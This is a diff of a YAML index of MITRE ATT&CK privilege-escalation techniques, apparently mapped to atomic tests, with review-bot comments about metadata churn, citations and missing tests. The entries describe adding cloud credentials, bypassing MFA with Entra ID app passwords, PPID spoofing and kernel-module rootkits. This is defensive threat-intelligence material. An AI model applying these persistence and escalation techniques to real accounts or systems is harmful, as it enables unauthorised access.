T1547.015:
@@ -19590,7 +19888,7 @@ privilege-escalation:
url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
5, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T16:36:37.042Z'
name: 'Boot or Logon Autostart Execution: Login Items'
description: |-
Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call SMLoginItemSetEnabled
.
@@ -19618,8 +19916,6 @@ privilege-escalation:
- 'File: File Modification'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.015
atomic_tests: []
T1134.001:
@@ -19678,23 +19974,22 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.001
atomic_tests: []
T1098.001:
technique:
- modified: '2024-02-28T14:35:00.862Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Credentials'
description: "Adversaries may add adversary-controlled credentials to a cloud
account to maintain persistent access to victim accounts and instances within
the environment.\n\nFor example, adversaries may add credentials for Service
Principals and Applications in addition to existing legitimate credentials
- in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
- Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
- both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
- With sufficient permissions, there are a variety of ways to add credentials
- including the Azure Portal, Azure command line interface, and Azure or Az
- PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+ in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+ Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+ include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+ Guidance) With sufficient permissions, there are a variety of ways to add
+ credentials including the Azure Portal, Azure command line interface, and
+ Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
infrastructure-as-a-service (IaaS) environments, after gaining access through
[Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
may generate or import their own SSH keys using either the CreateKeyPair
@@ -19704,11 +19999,15 @@ privilege-escalation:
usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
Expel Behind the Scenes)\n\nAdversaries may also use the CreateAccessKey
API in AWS or the gcloud iam service-accounts keys create
command
- in GCP to add access keys to an account. If the target account has different
- permissions from the requesting account, the adversary may also be able to
- escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+ in GCP to add access keys to an account. Alternatively, they may use the CreateLoginProfile
+ API in AWS to add a password that can be used to log into the AWS Management
+ Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+ Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+ If the target account has different permissions from the requesting account,
+ the adversary may also be able to escalate their privileges in the environment
+ (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
- 2.0) For example, in Azure AD environments, an adversary with the Application
+ 2.0) For example, in Entra ID environments, an adversary with the Application
Administrator role can add a new set of credentials to their application's
service principal. In doing so the adversary would be able to access the service
principal’s roles and permissions, which may be different from those of the
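Review bot: the added sentence on `CreateLoginProfile` names a third AWS credential-addition path (a console password) alongside `CreateAccessKey` and `gcloud iam service-accounts keys create`, but the technique's detection guidance retained in a later hunk still only covers SSH key creation or import and Azure service principal changes (`Monitor for the usage of APIs that create or import SSH keys`). That text is upstream and not something to edit in the index, but the gap is exactly what an atomic test for this entry should exercise: an IAM `CreateLoginProfile` or `CreateAccessKey` call against a user other than the caller, with the target's permissions differing from the caller's as the description spells out for the privilege-escalation case.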
@@ -19719,12 +20018,19 @@ privilege-escalation:
tied to the permissions of the original user account. These temporary credentials
may remain valid for the duration of their lifetime even if the original account’s
API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
- Persistence)"
+ Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+ adversaries may be able to add an app password to a user account.(Citation:
+ Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+ legacy devices that do not support multi-factor authentication (MFA), adding
+ an app password can allow an adversary to bypass MFA requirements. Additionally,
+ app passwords may remain valid even if the user’s primary password is reset.(Citation:
+ Microsoft Entra ID App Passwords)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Expel
- Oleg Kolesnikov, Securonix
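Review bot: `x_mitre_attack_spec_version: 3.2.0` is inserted here between `kill_chain_phases` and `x_mitre_contributors` while the identical line is deleted from the end of the same object further down (together with `x_mitre_modified_by_ref`, which likewise reappears above `x_mitre_platforms` in a later hunk). The values do not change; only the key order does, which turns a small content change into several hunks and will recur on every regeneration. Have the generator emit keys in a stable order, sorted or in upstream STIX order, so diffs of this file show only content changes. The new app-password paragraph itself is fine: its two citation keys are added in the references hunks below, and the point that app passwords bypass MFA and can survive a primary-password reset is what a defender needs to know.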
@@ -19733,6 +20039,7 @@ privilege-escalation:
- Alex Soler, AttackIQ
- Dylan Silva, AWS Security
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
@@ -19741,13 +20048,16 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- - Azure AD
- SaaS
- x_mitre_version: '2.7'
+ - Identity Provider
+ x_mitre_version: '2.8'
x_mitre_data_sources:
- 'User Account: User Account Modification'
+ - 'Active Directory: Active Directory Object Creation'
+ - 'Active Directory: Active Directory Object Modification'
type: attack-pattern
id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
created: '2020-01-19T16:10:15.008Z'
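Review bot: the two `Active Directory: Active Directory Object Creation` and `Active Directory Object Modification` data sources added to T1098.001 sit on a technique whose platforms are now `IaaS`, `SaaS` and `Identity Provider` with `Azure AD` removed, which reads oddly at first glance. In ATT&CK's data-source model the Active Directory data source also covers Entra ID directory objects, so the addition is consistent with the Entra ID credential-addition scenario in the description and with the existing detection text about monitoring Azure activity logs for service principal and application modifications. No change needed, but a one-line note in the generator or README that `Active Directory` here includes Entra ID would save the next reader the same double-take.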
@@ -19773,10 +20083,18 @@ privilege-escalation:
description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
Principals. Retrieved January 19, 2020.
url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+ - source_name: Lacework AI Resource Hijacking 2024
+ description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+ June 6). Lacework Labs. Retrieved July 1, 2024.
+ url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
- source_name: GCP SSH Key Add
description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
October 1, 2020.
url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+ - source_name: Permiso Scattered Spider 2023
+ description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+ SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+ url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
- source_name: Blue Cloud of Death Video
description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
Azure. Retrieved November 21, 2019.'
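Review bot: the new `Lacework AI Resource Hijacking 2024` reference is formatted title-first (`Detecting AI resource-hijacking with Composite Alerts. (2024, June 6). Lacework Labs.`) while every other entry in this list is author-first, e.g. the adjacent `Permiso Scattered Spider 2023` entry. This comes from upstream ATT&CK and the index should not rewrite it, but note that the two Blue Cloud of Death entries in the retained context here and in the next hunk spell the author as both `Kunz, Bruce` and `Kunz, Bryce`; if a citation-normalisation pass is ever added to the generator, these are the cases to test it on.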
@@ -19785,10 +20103,20 @@ privilege-escalation:
description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
Azure. Retrieved October 23, 2019.'
url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+ - source_name: Microsoft Entra ID App Passwords
+ description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+ authentication with legacy applications using app passwords. Retrieved May
+ 28, 2024.
+ url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
- source_name: Microsoft SolarWinds Customer Guidance
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 17, 2020.
url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+ - source_name: Mandiant APT42 Operations 2024
+ description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+ Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+ Retrieved May 28, 2024.'
+ url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
- source_name: Expel Behind the Scenes
description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -19805,9 +20133,6 @@ privilege-escalation:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.001
atomic_tests: []
T1134.003:
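Review bot: T1098.001 still ends with `atomic_tests: []` after a description update that now names several concrete credential-addition operations (`CreateAccessKey`, `CreateLoginProfile`, `gcloud iam service-accounts keys create`, and adding an app password or service principal credential in Entra ID). For an index whose purpose is to map techniques to atomic tests, that is the more important gap in this entry than the metadata churn. The three trailing keys removed here are the tail of the key reordering seen earlier in this object: `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` reappear higher up, and only `spec_version` is actually gone.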
@@ -19871,7 +20196,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.003:
technique:
@@ -19960,7 +20284,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.003
atomic_tests: []
T1134.004:
@@ -20018,7 +20341,7 @@ privilege-escalation:
Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe
rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe
), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-03T02:15:42.360Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Access Token Manipulation: Parent PID Spoofing'
x_mitre_detection: |-
@@ -20043,12 +20366,11 @@ privilege-escalation:
- Host Forensic Analysis
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.004
atomic_tests: []
T1546.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:27:11.065Z'
name: 'Event Triggered Execution: Change Default File Association'
description: "Adversaries may establish persistence by executing malicious content
triggered by a file type association. When a file is opened, the default program
@@ -20074,7 +20396,6 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Stefan Kanthak
@@ -20088,7 +20409,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -20115,8 +20435,8 @@ privilege-escalation:
url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
- source_name: Microsoft File Handlers
description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
- Retrieved November 13, 2014.
- url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+ Retrieved September 12, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
- source_name: Microsoft Assoc Oct 2017
description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
7, 2018.
@@ -20127,7 +20447,8 @@ privilege-escalation:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.001
atomic_tests: []
T1055.014:
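Review bot: the net effect for T1546.001 across this hunk and the two preceding ones is a spec bump from `x_mitre_attack_spec_version: 2.1.0` (removed above `x_mitre_contributors`) to `3.2.0` (added here), `x_mitre_modified_by_ref` moved to the end, `spec_version` dropped, and `modified` advanced from 2023-05-09 to 2024-09-12 to match the refreshed Microsoft File Handlers citation, while `x_mitre_version: '1.0'` is left alone, which is right for a citation-URL-only refresh. This is the treatment the 2.1.0-era objects earlier in the file (T1546.012, T1055.013, T1574.005 and the others) should also receive instead of losing their spec version outright; if the difference reflects which objects upstream has touched, say so in the commit message.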
@@ -20198,7 +20519,7 @@ privilege-escalation:
resources, and possibly elevated privileges. Execution via VDSO hijacking
may also evade detection from security products since the execution is masked
under a legitimate process. "
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-07T17:09:09.048Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: VDSO Hijacking
x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -20225,7 +20546,6 @@ privilege-escalation:
- Application control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.014:
technique:
@@ -20265,7 +20585,7 @@ privilege-escalation:
The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients
, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist
.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T00:16:01.732Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Emond'
x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -20285,12 +20605,11 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.014
atomic_tests: []
T1574.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.026Z'
name: Services File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -20344,11 +20663,10 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1547.001:
technique:
- modified: '2023-10-16T09:08:22.319Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
description: |-
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -20435,9 +20753,9 @@ privilege-escalation:
in the Registry. Retrieved August 3, 2020.
url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Oddvar Moe RunOnceEx Mar 2018
description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
from Autoruns.exe. Retrieved June 29, 2018.
@@ -20450,12 +20768,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.001
atomic_tests: []
T1098:
technique:
- modified: '2024-01-16T22:24:38.234Z'
+ modified: '2024-10-15T15:35:57.382Z'
name: Account Manipulation
description: "Adversaries may manipulate accounts to maintain and/or elevate
access to victim systems. Account manipulation may consist of any action that
@@ -20491,16 +20808,15 @@ privilege-escalation:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- IaaS
- Linux
- macOS
- - Google Workspace
- SaaS
- Network
- Containers
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
@@ -20541,143 +20857,141 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098
atomic_tests: []
T1547.006:
technique:
- x_mitre_platforms:
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-09-12T17:30:54.170Z'
+ name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+ description: |-
+ Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
+
+ When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+ Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+ Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+ Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
x_mitre_contributors:
- Wayne Silva, F-Secure Countercept
- Anastasios Pingios
- Jeremy Galloway
- Red Canary
- Eric Kaiser @ideologysec
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_deprecated: false
+ x_mitre_detection: |
+ Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+ Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
+
+ On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'File: File Creation'
+ - 'File: File Modification'
+ - 'Kernel: Kernel Module Load'
+ - 'Process: Process Creation'
+ x_mitre_permissions_required:
+ - root
type: attack-pattern
id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
created: '2020-01-24T17:42:23.339Z'
- x_mitre_version: '1.3'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1547.006
url: https://attack.mitre.org/techniques/T1547/006
+ external_id: T1547.006
- source_name: Apple Developer Configuration Profile
- url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
September 23, 2021.
+ url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
- source_name: Apple Kernel Extension Deprecation
- url: https://developer.apple.com/support/kernel-extensions/
description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
Alternatives. Retrieved November 4, 2020.
+ url: https://developer.apple.com/support/kernel-extensions/
- source_name: System and kernel extensions in macOS
- url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
March 31, 2022.
+ url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
- source_name: GitHub Reptile
- url: https://github.com/f0rb1dd3n/Reptile
description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
April 9, 2018.
+ url: https://github.com/f0rb1dd3n/Reptile
- source_name: Volatility Phalanx2
- url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+ url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
- source_name: iDefense Rootkit Overview
- url: http://www.megasecurity.org/papers/Rootkits.pdf
description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
- April 6, 2018.
+ September 12, 2024.
+ url: https://www.megasecurity.org/papers/Rootkits.pdf
- source_name: Linux Loadable Kernel Module Insert and Remove LKMs
- url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
description: Henderson, B. (2006, September 24). How To Insert And Remove
LKMs. Retrieved April 9, 2018.
+ url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
- source_name: CrowdStrike Linux Rootkit
- url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
Retrieved December 21, 2017.
+ url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
- source_name: GitHub Diamorphine
- url: https://github.com/m0nad/Diamorphine
description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+ url: https://github.com/m0nad/Diamorphine
- source_name: Securelist Ventir
- url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
your MacOS spy. Retrieved April 6, 2018.'
+ url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
- source_name: User Approved Kernel Extension Pike’s
- url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
Loading…. Retrieved September 23, 2021.
+ url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
- source_name: Linux Kernel Module Programming Guide
- url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
Retrieved April 6, 2018.
+ url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
- source_name: Linux Kernel Programming
- url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
Module Programming Guide. Retrieved April 6, 2018.
+ url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
- source_name: Trend Micro Skidmap
- url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
Retrieved June 4, 2020.
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
- source_name: Purves Kextpocalypse 2
- url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
. Retrieved September 23, 2021.
